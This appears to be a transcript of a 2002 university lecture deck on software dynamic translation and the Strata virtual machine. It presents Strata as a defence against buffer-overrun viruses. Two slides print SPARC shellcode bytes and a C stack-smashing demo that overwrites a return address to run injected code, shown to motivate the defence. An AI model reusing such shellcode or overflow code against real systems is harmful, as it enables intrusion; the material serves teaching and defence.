1 / 15

Applications of Software Dynamic Translation

Applications of Software Dynamic Translation. Jack Davidson University of Virginia February 27, 2002. What is SDT?. Software: Implemented using flexible, software VM Dynamic: Operates on running programs Translation: Modifies some or all of a program’s instructions before they execute.

saniya
Download Presentation

Applications of Software Dynamic Translation

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Applications of Software Dynamic Translation Jack Davidson University of Virginia February 27, 2002 University of Virginia Department of Computer Science

  2. What is SDT? • Software: Implemented using flexible, software VM • Dynamic: Operates on running programs • Translation: Modifies some or all of a program’s instructions before they execute University of Virginia Department of Computer Science

  3. Software Dynamic Translation University of Virginia Department of Computer Science

  4. Why Use SDT? • Improve program performance • Adapt program to its execution environment • Overcome economic barriers • Allow one architecture’s binaries to run on another • Application specific ISA improvements • Code decompression • Resource management • Power, memory footprint, resource protection • Software engineering and quality control • Performance monitoring, fault isolation, debugging University of Virginia Department of Computer Science

  5. Strata • Infrastructure designed for building SDTs • Can be extended to support a wide variety of SDT applications • Provides: • Platform independent common services • Target interface that abstracts target-specific support functions • Target-specific support functions • SPARC and MIPS • ARM and x86 (underway) University of Virginia Department of Computer Science

  6. Strata Virtual Machine • Base VM implements a simple SDT • Programmer implements new SDTs by customizing the VM • VM is customized by overriding functions in the target interface University of Virginia Department of Computer Science

  7. Computer Viruses • Melissa, Code Red, Nimba, I love you • Cost of dealing with viruses is high • Code Red cost $1.2B (USA Today) • Melissa cost $385M (Trusecure Corp) • Most viruses use a buffer overrun exploit to gain control University of Virginia Department of Computer Science

  8. Spread of Code Red • Animation University of Virginia Department of Computer Science

  9. Hacking 101 • Exploit lack of bounds checking in C programs • Malicious user provides input string that is actually code • Change return address to jump to malicious code by overrunning a buffer • Typically use strcpy(), strcat(), sprintf(), etc. University of Virginia Department of Computer Science

  10. Buffer Overrun Attacks University of Virginia Department of Computer Science

  11. #include <stdio.h> char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08\x81\xc7\xe0\x08\x83\xe8\x40\x01"; Hacking 201 University of Virginia Department of Computer Science

  12. void trustme (void) { unsigned buffer[24]; printf("Evil buffer lives at %08x\n", buffer); long_ptr = (long *)large_string; for (i=0; i<44; i++) *(long_ptr+i) = ((int)buffer) - 8; for (i=0; i<(int)strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy((char *)buffer, large_string); return; } void naive (void) { trustme(); return; /* This should execute the injected code. */ } void main (int argc, char *argv[]) { naive(); printf("Nothing bad happened!\n"); } Hacking 201 University of Virginia Department of Computer Science

  13. Stopping Viruses with Strata University of Virginia Department of Computer Science

  14. Preventing Stack Smashing Attacks with Strata insn_t my_fetch (iaddr_t PC) { if (in_stack(PC)) strata_fatal(“Smash!”); else (*SPARC_TI.fetch)(PC); } Override fetch TI = SPARC_TI; TI.fetch = my_fetch; University of Virginia Department of Computer Science

  15. Strata Security API • With the security API a user can specify and implement security policies • Prevent suid programs from exec’ing a shell • Filter URLs • Sandbox file system • Prevent writes to specified files (e.g., registry) • Produce audit trails University of Virginia Department of Computer Science

More Related